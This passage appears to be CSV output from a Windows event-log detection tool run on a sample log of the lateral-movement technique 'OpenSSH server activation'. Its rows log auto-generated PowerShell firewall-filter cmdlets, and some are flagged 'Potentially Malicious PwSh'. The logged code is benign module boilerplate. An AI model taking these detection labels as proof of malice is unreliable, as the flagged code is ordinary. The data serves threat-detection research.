($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.300 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.301 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 
10:19:38.302 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.302 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.338 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = 
$myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 
'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias 
'*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.338 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } 
